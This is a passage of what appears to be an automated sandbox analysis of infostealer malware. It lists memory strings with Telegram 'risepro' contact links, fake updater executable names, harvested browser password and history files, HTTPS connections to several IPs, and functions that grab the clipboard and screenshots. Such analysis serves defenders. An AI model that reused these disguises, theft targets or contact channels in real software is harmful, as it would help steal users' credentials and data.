Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro
Source: RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro.101
Source: RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro.1010
Source: RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr	String found in binary or memory: https://t.me/risepro_bot
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot101US1
Source: RegAsm.exe, 00000019.00000002.3510229323.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot4.17.
Source: 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot7
Source: MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botEL
Source: MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot_M
Source: MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botisepro_botC
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botlater
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botlaterH
Source: 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botlaterXM
Source: RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botlateri
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botr
Source: MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botv
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botwX~
Source: OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, U8cABsPhZFkKRrQ4rE0N.exe.0.dr, MSIUpdaterV1.exe1.0.dr, retailerTest[1].exe.0.dr, lumma2804[1].exe.0.dr, MSIUpdaterV1.exe0.0.dr, v6ggwc2fJXXgIu5fzDQ2.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OJa1BOigU3.exe, 00000000.00000003.2157899716.0000000005E20000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156801690.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, iuT8dZ3bOpVeWeb Data.0.dr, CBo4vvuzz0ClWeb Data.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: v6ggwc2fJXXgIu5fzDQ2.exe, MSIUpdaterV1.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.000000000157A000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: OJa1BOigU3.exe, 00000000.00000003.2156163035.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2157031351.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156878730.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2157678876.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2161760706.0000000005E18000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346129634.000000000157A000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/x
Source: OJa1BOigU3.exe, 00000000.00000003.2156163035.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2157031351.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2156878730.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000003.2157678876.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49821 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_0042FB30 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

17_2_0042FB30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_0042FB30 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

17_2_0042FB30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_00431351 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

17_2_00431351

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Code function: 15_2_01350C38	15_2_01350C38
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Code function: 15_2_013509B0	15_2_013509B0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Code function: 15_2_0135099F	15_2_0135099F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_004213B0	17_2_004213B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0043F660	17_2_0043F660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_004209E0	17_2_004209E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00404B00	17_2_00404B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0043EC50	17_2_0043EC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00426F56	17_2_00426F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00401000	17_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_004040FF	17_2_004040FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00437110	17_2_00437110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00407192	17_2_00407192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00423269	17_2_00423269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0043F2C0	17_2_0043F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00406320	17_2_00406320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00403699	17_2_00403699
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00401730	17_2_00401730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0041D7C0	17_2_0041D7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0040585F	17_2_0040585F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_004068E0	17_2_004068E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_004288F9	17_2_004288F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00422A63	17_2_00422A63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00420A60	17_2_00420A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00425A60	17_2_00425A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00403A90	17_2_00403A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0040FA90	17_2_0040FA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00405B08	17_2_00405B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00421B82	17_2_00421B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00423C66	17_2_00423C66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00423C20	17_2_00423C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00407D50	17_2_00407D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00405E23	17_2_00405E23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00416E26	17_2_00416E26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0043EF60	17_2_0043EF60
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003931B0	22_2_003931B0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041D220	22_2_0041D220
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0041D220	22_2_0041D220
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B13C0	22_2_004B13C0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B13C0	22_2_004B13C0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9470	22_2_004B9470
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B9470	22_2_004B9470
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040441D	22_2_0040441D
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040441D	22_2_0040441D
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FB590	22_2_003FB590
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003FB590	22_2_003FB590
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040475F	22_2_0040475F
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0040475F	22_2_0040475F
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B7850	22_2_004B7850
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004B7850	22_2_004B7850
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A98A9	22_2_003A98A9
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A4900	22_2_003A4900
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F3970	22_2_003F3970
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F3970	22_2_003F3970
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A0A52	22_2_003A0A52
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_004BBBF0	22_2_004BBBF0
